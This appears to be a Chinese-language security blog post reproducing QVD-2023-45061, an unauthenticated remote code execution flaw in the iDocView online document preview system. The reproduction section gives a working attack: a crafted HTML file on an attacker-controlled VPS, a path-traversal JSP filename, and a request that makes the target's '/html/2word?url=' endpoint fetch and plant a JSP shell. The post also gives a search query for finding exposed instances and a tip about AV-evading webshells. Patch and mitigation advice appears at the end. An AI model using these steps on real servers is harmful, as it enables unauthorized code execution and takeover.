关注我们❤️,添加星标🌟,一起学安全!
作者:Locks_@Timeline Sec
本文字数:1042
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
I Doc View 在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统。主要为用户提供各种类型的文档文件的在线预览,而无需下载或安装相应的软件。
0x02 漏洞概述
漏洞编号:QVD-2023-45061
I Doc View 在线文档预览系统存在远程代码执行漏洞,未经身份验证的远程攻击者利用 "/html/2word?url=" 接口可使服务器远程下载恶意文件,从而执行任意代码。
0x03 影响版本
iDocView < 13.10.1_20231115
0x04 环境搭建
有条件的请移步这边
申请安装到您自己服务器的一个月免费试用版,请填写一下这个申请表:
https://wj.qq.com/s2/5983516/63c4/
语法查询:
title ==
"在线文档预览 - I Doc View"
0x05 漏洞复现
第一步:最好在vps上创建一个新的文件夹复现
vim timelinesec.html构造html文件
<!DOCTYPE
html
>
<
html
lang
=
"en"
>
<
head
>
<
title
>
test
</
title
>
</
head
>
<
body
>
<
link
href
=
"/......docviewlocks.jsp"
>
</
body
>
</
html
>
构造恶意文件
vi
'......docviewlocks.jsp'
<%out.print(
"Locks_"
);%>
在服务器开启python的http服务
python3.10 -m http.server 80
然后在 I Doc View 在线文档预览系统上访问路径 :
http://your-ip/html/2word?url=http://your-vps-ip/timelinesec.html
https://xxx.xx.xx.xx:84/html/2word?url=http://your-vps-ip/timelinesec.html
其他都是之前测试用的,不用在意 当两个请求都响应200时会下载一个word文件,表示利用成功
访问locks.jsp验证
tips:上传的马子需要是免杀后才能上传成功(公众号后台回复“231226”获取免杀工具地址)
上传的手法一样,多等一会,让子弹飞一会
漏洞分析:解析应用中的远程页面缓存功能没有对输入的URL进行充分的安全验证,通过构造特殊的URL,使得应用下载恶意文件
0x06 修复方式
1、官方修复方案:厂商已禁用漏洞相关接口并升级软件版本到13.10.1_20231115,客户可升级到该版本解决漏洞,官网https://api.idocv.com已升级到最新版本。
2、临时修复方案:a.使用防护类设备对相关资产进行防护;b.如非必要,避免将资产暴露在互联网;如有需要可通过网络ACL策略限制访问来源,只允许特定IP进行访问;c.限制服务器主动访问外部陌生链接。
推荐服务
历史漏洞
I Doc View在线文档预览系统存在弱口令
I Doc View在线文档预览系统 view 任意文件读取漏洞
I Doc View在线文档预览系统 upload 任意文件读取漏洞
I Doc View在线文档预览系统 view 服务端请求伪造
I Doc View在线文档预览系统system rce
后台功能
回复【1】领取新人学习资料
回复【2】进入漏洞查询功能
回复【3】获取加群方式
回复【4】进入SRC-QQ交流群
商务合作
原文始发于微信公众号(Timeline Sec):QVD-2023-45061:I Doc View在线文档预览系统RCE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论